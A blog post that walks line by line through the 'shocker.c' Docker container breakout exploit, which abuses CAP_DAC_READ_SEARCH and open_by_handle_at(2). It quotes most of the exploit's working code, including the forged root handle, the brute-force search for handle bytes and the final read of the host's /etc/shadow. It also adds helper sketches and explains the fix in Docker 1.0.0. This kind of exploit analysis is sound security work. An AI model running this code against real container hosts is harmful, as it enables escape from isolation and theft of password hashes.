Docker breakout exploit analysis 

a summary and line by line overview

Recently, an interesting Docker exploit was posted (http://stealth.openwall.net/xSports/shocker.c) that demonstrates an information leak in which a Docker container can access privileged filesystem data that it shouldn’t be able to reach. As I was just discussing the relative merits of using Docker, and how security is often quoted as one of them, I thought it would be interesting to dissect exactly how this exploit works by looking at a bit of the code.

The core problem is a capability (CAP_DAC_READ_SEARCH) that is granted to the container process when it shouldn’t be, which illustrates how tricky container-level virtualization can be to configure. To be fair, this isn’t necessarily a Docker-specific problem (it could happen with any misconfigured container), and it should also be pointed out that this was fixed in Docker 1.0.0.

The exploit makes this claim quite cleanly at the top of its file:

 * However
* as its only a bind-mount the fs struct from the task is shared
* with the host which allows to open files by file handles
* (open_by_handle_at()). As we thankfully have dac_override and
* dac_read_search we can do this.

What does this mean? Well, let’s just head to the helpful ol’ man-page (`man 7 capabilities`) to find out.

Starting with kernel 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled. 

What this is saying is this: in traditional UNIX, you get root or nothing. With the advent of the 2.2 kernel, we are allowed more fine-grained access control over exactly what a privileged process can do. Which makes sense, and seems generally like a good idea.

The man page goes on to describe each capability, and if we look further at what the capability CAP_DAC_READ_SEARCH allows, we can confirm it grants access to open_by_handle_at(2), a system call that allows us to open a file given its file handle.

 CAP_DAC_READ_SEARCH
* Bypass file read permission checks and directory read and
execute permission checks;
* Invoke open_by_handle_at(2).
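
To check whether a process actually holds this capability, one option is to read the CapEff line of /proc/self/status and test bit 2, which is the number assigned to CAP_DAC_READ_SEARCH in <linux/capability.h>. The following is a minimal sketch rather than a complete tool; the names parse_cap_eff, has_capability and CAP_DAC_READ_SEARCH_BIT are made up for this illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Capability number of CAP_DAC_READ_SEARCH in <linux/capability.h>. */
#define CAP_DAC_READ_SEARCH_BIT 2

/* Extract the effective capability mask from text in the format of
 * /proc/<pid>/status. Returns 0 on success, -1 if no CapEff line exists. */
int parse_cap_eff(const char *status_text, uint64_t *mask)
{
    const char *line = strstr(status_text, "CapEff:");
    unsigned long long value;

    if (line == NULL || sscanf(line, "CapEff: %llx", &value) != 1)
        return -1;
    *mask = (uint64_t)value;
    return 0;
}

/* Returns 1 if capability number `cap` is set in `mask`, 0 otherwise. */
int has_capability(uint64_t mask, int cap)
{
    return (int)((mask >> cap) & 1);
}
```

Feeding this the contents of /proc/self/status from inside a container is a quick way to see whether that container would be exposed.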

If we `man 2 open_by_handle_at`, it all becomes clear.

int open_by_handle_at(int mount_fd, struct file_handle *handle,
                      int flags);

This system call takes a file descriptor for any open file or directory within the mount point of the file in question (mount_fd), a file handle that describes the file we wish to open, and flags that are interpreted the same way as the flags for open(2).

But Jen, you may be asking, why is this system call even necessary? Why do we need something other than the typical open(2) interface to open a file?

It’s a great question, and one that can also be answered by the `open_by_handle_at` man page:

 A file handle can be generated in one process using
name_to_handle_at() and later used in a different process that calls
open_by_handle_at().

So, where file descriptors are unique per process, which means you can’t easily pass them around, file handles are meant to be passed between processes. A handle is an opaque blob that identifies a file on a mounted filesystem, rather than an open file. You can probably already imagine why this is a security nightmare in the making. Say one process holds a handle for something like ‘/etc/shadow’, and another process ISN’T supposed to have access to that file, but can somehow call open_by_handle_at(2) on the same handle…

Well, you can see where this is going, and it’s not going to be pretty.
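
For reference, here is roughly how a handle is obtained the legitimate way. This is a sketch, assuming a Linux system with glibc and a filesystem that supports file handles; show_handle is a hypothetical helper name. Note that name_to_handle_at(2) needs no special privileges. It is only open_by_handle_at(2) that requires CAP_DAC_READ_SEARCH.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>

/* Print the handle the kernel reports for `path`.
 * Returns 0 on success, -1 if the call fails (for example because the
 * filesystem does not support file handles). */
int show_handle(const char *path)
{
    struct file_handle *fh = malloc(sizeof(*fh) + MAX_HANDLE_SZ);
    int mount_id;

    if (fh == NULL)
        return -1;

    /* Tell the kernel how much room f_handle has. */
    fh->handle_bytes = MAX_HANDLE_SZ;

    if (name_to_handle_at(AT_FDCWD, path, fh, &mount_id, 0) < 0) {
        perror("name_to_handle_at");
        free(fh);
        return -1;
    }

    printf("type=%d bytes=%u:", fh->handle_type, fh->handle_bytes);
    for (unsigned int i = 0; i < fh->handle_bytes; i++)
        printf(" %02x", fh->f_handle[i]);
    printf("\n");

    free(fh);
    return 0;
}
```

Calling show_handle("/etc/hostname") on a typical ext4 system prints the handle type followed by the raw handle bytes, which is the same data the exploit has to guess.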

If we tie this information back to what we know about CAP_DAC_READ_SEARCH, we see that granting it to our container not only allows us to traverse the file system without read permission checks, but also explicitly permits calls to open_by_handle_at(2), which could give our process access to sensitive files it was never meant to reach.

So, without further ado, how does our friend shocker.c accomplish this? Let’s find out.

First, let’s look at the data structure that’s defined at the top of the file, my_file_handle:

https://gist.github.com/jandre/4a8bed58dcb3455cfa85

This is simply an analog to the file_handle structure in the Linux kernel, defined here:

struct file_handle {
    __u32 handle_bytes;
    int handle_type;
    /* file identifier */
    unsigned char f_handle[0];
};

The kernel declares the actual file handle value (f_handle) with no size because its length depends on the filesystem and the handle type. On the 64-bit system described in the exploit it is 8 bytes, where the first 4 bytes hold the inode number of the path in question. A pointer to the custom struct is simply cast to struct file_handle * when passed to open_by_handle_at(2), which works because the two are laid out the same way in memory.
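
The layout claim can be checked at compile time. The sketch below redeclares the kernel structure under a different name (kernel_style_handle, an assumption made so the example compiles without extra headers) next to a fixed-size struct shaped like the one the exploit uses. The field names come from the code quoted in this post, while the exact field types are my assumption. make_handle is a hypothetical helper that packs an inode number into the first 4 bytes and a second 32-bit value into the last 4; for the kernel’s handle type 1, that second value is the inode’s generation number.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Mirror of the kernel's struct file_handle (renamed for this sketch). */
struct kernel_style_handle {
    uint32_t handle_bytes;
    int handle_type;
    unsigned char f_handle[];   /* flexible array member, no fixed size */
};

/* Fixed-size counterpart, shaped like the struct used by the exploit. */
struct my_file_handle {
    unsigned int handle_bytes;
    int handle_type;
    unsigned char f_handle[8];
};

/* The cast is only safe if the payload starts at the same offset. */
_Static_assert(offsetof(struct kernel_style_handle, f_handle) ==
               offsetof(struct my_file_handle, f_handle),
               "payload must start at the same offset");

/* Pack a 32-bit inode number and a 32-bit second half into a handle. */
struct my_file_handle make_handle(uint32_t ino, uint32_t gen)
{
    struct my_file_handle h;

    h.handle_bytes = 8;
    h.handle_type = 1;
    memcpy(h.f_handle, &ino, sizeof(ino));
    memcpy(h.f_handle + 4, &gen, sizeof(gen));
    return h;
}
```

With this helper, make_handle(2, 0) produces the same 8 bytes as a root handle whose first byte is 0x02 on a little-endian machine.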

If we look at the main() function, we can see how the exploit takes advantage of the fact that the inode of the root directory (/) is almost always 2 (as it is on ext2/3/4), and uses that as a starting point to traverse the filesystem:

int main()
{
    char buf[0x1000];
    int fd1, fd2;
    struct my_file_handle h;
    struct my_file_handle root_h = {
        .handle_bytes = 8,
        .handle_type = 1,
        .f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
    };

It then gets a file descriptor (what will be mount_fd in the open_by_handle_at(2) system call) by opening a Docker file that is commonly bind-mounted into the container from the host:

    // get a FS reference from something mounted in from outside
    if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0)
        die("[-] open");

The meat of the code is in find_handle(), which takes this file descriptor, the file handle of the root directory (‘/’), and a variable ‘h’ that will hold the output file handle of the file we are looking for (in this case, ‘/etc/shadow’).

    if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
        die("[-] Cannot find valid handle!");

So let’s look at find_handle() next.

int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh) {

From the definition of find_handle(), you can see it takes a file descriptor to use as mount_fd (hello, /.dockerinit!), a path to look for, an input file handle, and an output file handle that our results get copied to.

At a high level, this function operates recursively, with two modes:

a) If we have not reached the ‘leaf’ (the file itself, which is tested by looking for a ‘/’ in the path), we treat the input handle as a directory and list its contents.

We use open_by_handle_at(2) to get a file descriptor to the directory, and then scan its entries for the one whose name matches the next component of path, recording its inode:

if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
    die("[-] open_by_handle_at");

if ((dir = fdopendir(fd)) == NULL)
    die("[-] fdopendir");

for (;;) {
    de = readdir(dir);
    if (!de)
        break;
    fprintf(stderr, "[*] Found %s\n", de->d_name);
    if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
        fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
        ino = de->d_ino;
        break;
    }
}
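
One detail worth noticing in the loop above: the strncmp() call compares only strlen(de->d_name) bytes, so any entry whose name is a prefix of the remaining path counts as a match. That is good enough for a proof of concept, but a directory entry named ‘et’ would match ‘etc/shadow’ just as well as ‘etc’ does. The sketch below contrasts that check with a stricter one; prefix_match and component_match are names invented for this illustration and are not part of the exploit.

```c
#include <string.h>

/* The check used in the quoted loop: compares only strlen(name) bytes. */
int prefix_match(const char *name, const char *path)
{
    return strncmp(name, path, strlen(name)) == 0;
}

/* Stricter variant: name must equal the whole first path component,
 * i.e. everything in `path` up to the next '/' or the end of the string. */
int component_match(const char *name, const char *path)
{
    size_t len = strcspn(path, "/");

    return strlen(name) == len && strncmp(name, path, len) == 0;
}
```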

Once the inode is found, we brute force the remaining 32 bits of f_handle to get the handle we are looking for (remember, the inode comprises the first 32 bits), then we call find_handle() again with that handle as the new starting point:

if (de) {
    for (uint32_t i = 0; i < 0xffffffff; ++i) {
        outh.handle_bytes = 8;
        outh.handle_type = 1;
        memcpy(outh.f_handle, &ino, sizeof(ino));
        memcpy(outh.f_handle + 4, &i, sizeof(i));

        if ((i % (1<<20)) == 0)
            fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
        if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
            closedir(dir);
            close(fd);
            dump_handle(&outh);
            return find_handle(bfd, path, &outh, oh);
        }
    }
}
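
The shape of that search can be isolated from the system call. In the sketch below, the kernel’s accept/reject decision is replaced by a callback, so the loop can be run and tested without any privileges. The names probe_fn, guess_second_half and accept_if_equal are hypothetical, and the struct is redeclared with assumed field types so the block stands alone. In the real exploit, the role of the probe is played by open_by_handle_at(2).

```c
#include <stdint.h>
#include <string.h>

struct my_file_handle {
    unsigned int handle_bytes;
    int handle_type;
    unsigned char f_handle[8];
};

/* Returns nonzero if the handle would be accepted. */
typedef int (*probe_fn)(const struct my_file_handle *h, void *ctx);

/* Try every second-half value in [0, limit] for a known inode number.
 * Returns 1 and fills *out on the first accepted handle, 0 otherwise. */
int guess_second_half(uint32_t ino, uint32_t limit, probe_fn probe,
                      void *ctx, struct my_file_handle *out)
{
    uint32_t i = 0;

    for (;;) {
        struct my_file_handle h = { .handle_bytes = 8, .handle_type = 1 };

        memcpy(h.f_handle, &ino, sizeof(ino));
        memcpy(h.f_handle + 4, &i, sizeof(i));
        if (probe(&h, ctx)) {
            *out = h;
            return 1;
        }
        if (i == limit)     /* inclusive upper bound, no overflow */
            return 0;
        ++i;
    }
}

/* Stand-in probe for experiments: accepts exactly one secret value,
 * passed through ctx as a pointer to uint32_t. */
int accept_if_equal(const struct my_file_handle *h, void *ctx)
{
    uint32_t second_half;

    memcpy(&second_half, h->f_handle + 4, sizeof(second_half));
    return second_half == *(const uint32_t *)ctx;
}
```

A search space of 32 bits is small enough to walk exhaustively, which is why knowing the inode number is all the exploit really needs.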

b) If we’ve reached the leaf (which is checked by seeing whether there are any more slashes in the path), we simply copy the input file handle to the output file handle and return the match!

if (!path) {
    memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
    oh->handle_type = 1;
    oh->handle_bytes = 8;
    return 1;
}

Once find_handle() returns successfully, we simply call open_by_handle_at(2) on the returned file handle, then call read() on the resulting file descriptor:

fprintf(stderr, "[!] Got a final handle!\n");
dump_handle(&h);

if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
    die("[-] open_by_handle");

memset(buf, 0, sizeof(buf));
if (read(fd2, buf, sizeof(buf) - 1) < 0)
    die("[-] read");

fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);

So how was this vulnerability introduced? The Docker folks have released a helpful post-mortem:

In earlier Docker Engine releases (pre-Docker Engine 0.12) we dropped a specific list of kernel capabilities, ( a list which did not include this capability), and all other kernel capabilities were available to Docker containers. In Docker Engine 0.12 (and continuing in Docker Engine 1.0) we drop all kernel capabilities by default. Essentially, this changes our use of kernel capabilities from a blacklist to a whitelist.

Basically this means that CAP_DAC_READ_SEARCH was a capability they had forgotten to add to their default blacklist. The problem no longer applies as of Docker 1.0.0, since capabilities are now dropped unless they are explicitly whitelisted. Yay!
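
The difference between the two approaches is easy to see with capability sets written as bitmasks. The sketch below is purely illustrative: the capability numbers are the ones from <linux/capability.h>, but the example lists are invented and are not Docker’s actual blacklist or whitelist, and the helper names are hypothetical.

```c
#include <stdint.h>

#define CAP_MASK(n) (UINT64_C(1) << (n))

/* Capability numbers as defined in <linux/capability.h>. */
enum {
    CAP_CHOWN_N            = 0,
    CAP_DAC_READ_SEARCH_N  = 2,
    CAP_NET_BIND_SERVICE_N = 10,
    CAP_SYS_MODULE_N       = 16,
    CAP_SYS_ADMIN_N        = 21
};

/* Blacklist: start with everything, remove what is listed.
 * Anything the list forgets stays available. */
uint64_t apply_blacklist(uint64_t all, uint64_t dropped)
{
    return all & ~dropped;
}

/* Whitelist: start with nothing, keep only what is listed.
 * Anything the list forgets is gone. */
uint64_t apply_whitelist(uint64_t all, uint64_t kept)
{
    return all & kept;
}
```

With a blacklist that names only CAP_SYS_MODULE and CAP_SYS_ADMIN, the CAP_DAC_READ_SEARCH bit survives; with a whitelist that names only CAP_CHOWN and CAP_NET_BIND_SERVICE, it does not.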

The lesson to be learned is that sandboxing things, especially sandboxing apps that need some level of root privileges or access, is not easy.


Further reading:

To read more about the various capabilities that are configurable in the kernel, see man 7 capabilities (http://man7.org/linux/man-pages/man7/capabilities.7.html).

Postmortem from the docker folks: http://blog.docker.com/2014/06/docker-container-breakout-proof-of-concept-exploit/


like this kind of stuff? come work @threatstack — https://www.threatstack.com
